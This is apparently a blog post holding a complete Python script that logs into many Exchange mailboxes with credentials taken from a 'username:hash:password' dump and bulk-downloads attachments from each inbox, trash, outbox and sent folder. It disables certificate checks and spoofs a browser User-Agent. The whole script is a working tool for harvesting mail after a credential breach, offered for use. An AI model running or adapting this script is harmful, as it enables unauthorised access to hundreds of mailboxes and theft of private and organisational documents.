# Exchange mail crawler (original title: exchange邮件爬虫)

#!/usr/bin/python3
# coding=utf8

from __future__ import print_function
import shutil
from exchangelib import Credentials, Account, Configuration, DELEGATE, FileAttachment, EWSDateTime
from multiprocessing.pool import Pool

from exchangelib.protocol import BaseProtocol
from exchangelib.protocol import NoVerifyHTTPAdapter
from urllib3.exceptions import InsecureRequestWarning
import urllib3
import time, os, sys, linecache
urllib3.disable_warnings(InsecureRequestWarning)

# Connection settings; all three are empty placeholders in this file.
URL = ""  # NOTE(review): not referenced by any code visible in this file
MAIL_SERVER = ""  # passed as `server=` to exchangelib's Configuration in getAccount
suffix = "" # mailbox suffix; getAccount appends "@" + suffix to usernames lacking it

# Tell exchangelib to use this adapter class instead of the default
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
# Override the User-Agent string exchangelib sends with a desktop Chrome one.
BaseProtocol.USERAGENT = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"

# NOTE(review): FILTER is not referenced by any code visible in this file.
FILTER = ['admin_meical', 'e_news', 'LanguageCenter', 'rtaf_news', 'weather', "Welfare", "dict1"]
# Only attachments whose name contains this substring are downloaded.
AttachFilter = 'ppt'

# Date window; currently only referenced from commented-out filter code.
TSTART = EWSDateTime(2020, 7, 3)
TEND = EWSDateTime(2022, 7, 3)

# Import-time side effect: make sure ./attach exists in the working directory.
if not os.path.isdir("attach"):
    os.mkdir("attach")

pwd_path = os.getcwd()
# Shared directory that receives a copy of every saved attachment.
AttachDir = os.path.join(pwd_path, 'attach')

def R(message):
    """Return *message* wrapped in the ANSI escape codes 1;91 (bold, bright red)."""
    template = "\033[1;91m{}\033[0;m"
    return template.format(message)

def G(message):
    """Return *message* wrapped in the ANSI escape codes 1;92 (bold, bright green)."""
    template = "\033[1;92m{}\033[0;m"
    return template.format(message)

def Y(message):
    """Return *message* wrapped in the ANSI escape codes 1;93 (bold, bright yellow)."""
    template = "\033[1;93m{}\033[0;m"
    return template.format(message)

def B(message):
    """Return *message* wrapped in the ANSI escape codes 1;94 (bold, bright blue)."""
    template = "\033[1;94m{}\033[0;m"
    return template.format(message)

def PrintException():
    """Print, in red, where the exception currently being handled was caught.

    Reads the active exception from ``sys.exc_info()`` and prints the line
    number and source text of the traceback's first entry together with the
    exception object. Does nothing when no exception is being handled
    (previously this raised ``AttributeError`` on the missing traceback).
    """
    _, exc_obj, tb = sys.exc_info()
    if tb is None:
        # Called outside an ``except`` block: there is nothing to report.
        return
    frame = tb.tb_frame
    lineno = tb.tb_lineno
    filename = frame.f_code.co_filename
    # Refresh linecache so an edited source file is re-read from disk.
    linecache.checkcache(filename)
    line = linecache.getline(filename, lineno, frame.f_globals)
    print(R('EXCEPTION IN (LINE {} "{}"): {}'.format(lineno, line.strip(), exc_obj)))

def getAccount(username, password):
    """Build an exchangelib ``Account`` for *username* on ``MAIL_SERVER``.

    When *username* does not already end with the module-level ``suffix``,
    ``"@" + suffix`` is appended to form the address. The account is created
    with autodiscover disabled and DELEGATE access.
    """
    address = username if username.endswith(suffix) else username + "@" + suffix
    creds = Credentials(address, password)
    server_config = Configuration(server=MAIL_SERVER, credentials=creds)
    return Account(
        primary_smtp_address=address,
        config=server_config,
        autodiscover=False,
        access_type=DELEGATE,
    )

def log(user, text):
    """Append *text* plus a newline to ``log.txt`` inside the *user* directory."""
    log_path = os.path.join(user, "log.txt")
    line = text + "\n"
    with open(log_path, "a", encoding="utf-8") as handle:
        handle.write(line)

def getinfo(user, account):
    """Print the message counts of the inbox, trash, outbox and sent folders."""
    inbox = account.inbox
    summary = "[*]Found {} mails in inbox, {} unread".format(
        inbox.total_count, inbox.unread_count)
    print(user, summary)
    # The remaining folders are reported as "<label> <total_count>", in order.
    for label in ("trash", "outbox", "sent"):
        print(label, getattr(account, label).total_count)

def mkuserdir(user):
    """Create the directory *user*, or print a notice if it already exists."""
    if os.path.isdir(user):
        print(B("[*]Dir %s already exists" % user))
        return
    os.mkdir(user)

def _attachment_file_name(raw_name, max_len=60, keep=55):
    """Return a directory-free, length-limited file name for an attachment."""
    # The name comes from the message itself, so drop any directory part to
    # keep the written file inside the target folder.
    name = os.path.basename(raw_name.replace("\\", "/"))
    if len(name) <= max_len:
        return name
    stem, dot, ext = name.rpartition(".")
    if not dot:
        # No extension to preserve; a plain cut is enough.
        return name[:keep]
    return "{}.{}".format(stem[:keep], ext)


def _save_attachment(attachment, target_dir):
    """Write *attachment* into *target_dir* and copy the file to ``AttachDir``."""
    os.makedirs(target_dir, exist_ok=True)
    attach_path = os.path.join(target_dir, _attachment_file_name(attachment.name))
    with open(attach_path, 'wb') as out, attachment.fp as src:
        chunk = src.read(1024)
        while chunk:
            out.write(chunk)
            chunk = src.read(1024)
    shutil.copy(attach_path, AttachDir)


def download_attachments(items, user):
    """Save every matching file attachment found in *items*.

    For each message that has attachments, file attachments whose name
    contains ``AttachFilter`` are written to
    ``<user>/<sender local part>_<received date>_<importance>/`` and copied
    into ``AttachDir``. Each saved attachment is recorded in the user's log
    and announced on stdout.

    Failures are best-effort: a failing attachment or message is reported in
    red and skipped, and processing continues with the next one. Errors raised
    while iterating *items* itself still propagate to the caller.

    Args:
        items: iterable of message objects (e.g. a folder query result).
        user: directory name used as the root for this user's files.
    """
    for item in items:
        try:
            if not item.has_attachments:
                continue
            target_dir = os.path.join(user, "%s_%s_%s" % (
                item.sender.email_address.split("@")[0],
                str(item.datetime_received).split()[0],
                item.importance,
            ))
            for attachment in item.attachments:
                if not isinstance(attachment, FileAttachment):
                    continue
                name = attachment.name
                if not name or AttachFilter not in name:
                    continue
                # Isolate each attachment so one failure does not drop the
                # remaining attachments of the same message.
                try:
                    _save_attachment(attachment, target_dir)
                except Exception as exc:
                    print(R("[-]Failed to save attachment %s for user %s: %s" % (name, user, exc)))
                    continue
                log(user, '[+]Attachment saved: ' + name)
                print(G("[+]Saved attachment: %s for user: %s" % (name, user)))
        except Exception as exc:
            # Keep going with the next message, but do not hide the failure.
            print(R("[-]Skipped a message for user %s: %s" % (user, exc)))

def getinbox(account, user):
    """Download matching attachments from every message in the inbox.

    Args:
        account: account object exposing an ``inbox`` folder.
        user: directory name the attachments are stored under.
    """
    # NOTE: to limit the download to a date window, replace ``.all()`` with
    # ``.filter(datetime_received__range=(start, end))`` built from TSTART/TEND.
    items = account.inbox.all()
    download_attachments(items, user)

def gettrash(account, user):
    """Download matching attachments from every message in the trash folder.

    Previously this read ``account.inbox`` again, so the trash was never
    scanned and the inbox was downloaded repeatedly.

    Args:
        account: account object exposing a ``trash`` folder.
        user: directory name the attachments are stored under.

    Returns:
        Always 0.
    """
    items = account.trash.all()
    download_attachments(items, user)
    return 0

def getoutbox(account, user):
    """Download matching attachments from every message in the outbox.

    Previously this read ``account.inbox`` again, so the outbox was never
    scanned and the inbox was downloaded repeatedly.

    Args:
        account: account object exposing an ``outbox`` folder.
        user: directory name the attachments are stored under.

    Returns:
        Always 0.
    """
    items = account.outbox.all()
    download_attachments(items, user)
    return 0

def getsent(account, user):
    """Download matching attachments from every message in the sent folder.

    Previously this read ``account.inbox`` again, so sent mail was never
    scanned and the inbox was downloaded repeatedly.

    Args:
        account: account object exposing a ``sent`` folder.
        user: directory name the attachments are stored under.

    Returns:
        Always 0.
    """
    items = account.sent.all()
    download_attachments(items, user)
    return 0

def usermail(user, passwd):
    """Download attachments from all folders of one mailbox, with retries.

    Creates the user's directory, builds the account (up to two attempts,
    20 s apart), then walks inbox, trash, outbox and sent (up to two
    attempts, 10 s apart).

    The original checked ``tries1 == 3`` after a loop bounded by ``< 2``, so a
    failed login was never detected and the download loop then ran against an
    unbound ``account``; the failure is now detected directly.

    Args:
        user: username (also used as the local directory name).
        passwd: password for the account.

    Returns:
        True when all folders were processed, False when the account could
        not be created or the download failed on every attempt.
    """
    mkuserdir(user)

    attempts = 2

    account = None
    for attempt in range(attempts):
        try:
            account = getAccount(user, passwd)
            break
        except Exception as exc:
            print(R("[-]Could not open account %s: %s" % (user, exc)))
            # Only wait when another attempt will actually follow.
            if attempt + 1 < attempts:
                time.sleep(20)
    if account is None:
        return False

    for attempt in range(attempts):
        try:
            # NOTE(review): the original guarded the inbox call with a check
            # against an empty hard-coded list, so it always ran.
            getinbox(account, user)
            gettrash(account, user)
            getoutbox(account, user)
            getsent(account, user)
            return True
        except Exception as exc:
            print(R("[-]Download failed for %s: %s" % (user, exc)))
            if attempt + 1 < attempts:
                time.sleep(10)
    return False

def account_entry(fp):
    """Process a batch of ``"username password"`` lines.

    Blank lines are ignored and lines without two fields are reported and
    skipped, instead of raising ``ValueError`` and aborting the whole batch.
    Everything after the first run of whitespace is taken as the password.

    Args:
        fp: iterable of text lines, one account per line.
    """
    for raw_line in fp:
        line = raw_line.strip()
        if not line:
            continue
        fields = line.split(None, 1)
        if len(fields) != 2:
            print(R("[-]Skipping malformed account line: %s" % fields[0]))
            continue
        user, passwd = fields
        usermail(user, passwd)

def chunk_accounts(lines, size):
    """Split *lines* into consecutive batches of at most *size* entries.

    Blank and whitespace-only lines are dropped first. Every entry ends up in
    exactly one batch; only the last batch may be shorter than *size*.
    *size* must be a positive integer.
    """
    entries = [line for line in lines if line.strip()]
    return [entries[start:start + size] for start in range(0, len(entries), size)]


if __name__ == '__main__':

    # new.txt holds one "username password" pair per line. It can be derived
    # from a "username:hash:password" dump (ori.txt) by keeping the first and
    # third colon-separated fields of each line.

    # Each worker process handles one batch of up to `thread_jobs` accounts
    # (e.g. 1600 accounts -> 20 workers of 80 accounts each).
    thread_jobs = 80
    with open("new.txt", encoding="utf-8") as f:
        all_list = chunk_accounts(f.read().split("\n"), thread_jobs)

    thread_num = len(all_list)
    print(G("[*]Thread num is: %s" % str(thread_num)))

    if thread_num:
        # The context manager tears the pool down once map() has returned.
        with Pool(processes=thread_num) as pool:
            pool.map(account_entry, all_list)
    else:
        # Pool(processes=0) would raise ValueError, so stop early instead.
        print(R("[-]No accounts found in new.txt"))
posted @   z5onk0  阅读(51)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
点击右上角即可分享
微信分享提示